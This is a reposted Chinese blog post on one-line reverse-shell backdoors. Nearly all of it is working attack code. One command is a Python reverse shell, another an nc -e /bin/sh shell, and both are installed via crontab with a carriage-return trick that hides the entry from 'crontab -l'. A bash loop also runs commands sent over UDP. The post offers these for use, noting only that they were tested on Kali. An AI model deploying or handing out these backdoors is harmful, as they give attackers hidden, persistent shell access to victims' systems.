码迷,mamicode.com
首页 > 其他好文 > 详细

一条命令实现命令行反弹后门

时间:2015-02-04 16:57:58      阅读:382      评论:0      收藏:0      [点我收藏+]

标签:python   import   

TCP反弹后门

//python版本,kali下面测试成功,tcp 8080:
(crontab -l;printf "*/5 * * * *  /usr/bin/python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"192.168.1.153\",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);‘;\rno crontab for `whoami`%100c\n")|crontab -

//nc版本,tcp 8080 kali下面测试成功:

(crontab -l;printf "*/5 * * * *  /bin/nc 192.168.1.153 8080 -e /bin/sh;\rno crontab for `whoami`%100c\n")|crontab -

 

 //任务写入技术分享/var/spool/cron/crontabs/$username,,每隔5分钟运行一次,crontab -l //直接提示no crontab for $username:
crontab -r //移除所有的计划任务
一般在/etc/crontab文件里面测试成功的语句就可以使用 


bash udp反弹后门

#!/bin/bash
exec 9<> /dev/udp/localhost/8080
[ $? -eq 1 ] && exit
echo "connect ok" >&9

while :
do
  a=`dd bs=200 count=1 <&9 2>/dev/null`
  if echo "$a"|grep "exit"; then break; fi
  echo `$a` >&9
done

exec 9>&-
exec 9<&-


本文出自 “Sanr” 博客,请务必保留此出处http://0x007.blog.51cto.com/6330498/1611463

一条命令实现命令行反弹后门

标签:python   import   

原文地址:http://0x007.blog.51cto.com/6330498/1611463

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!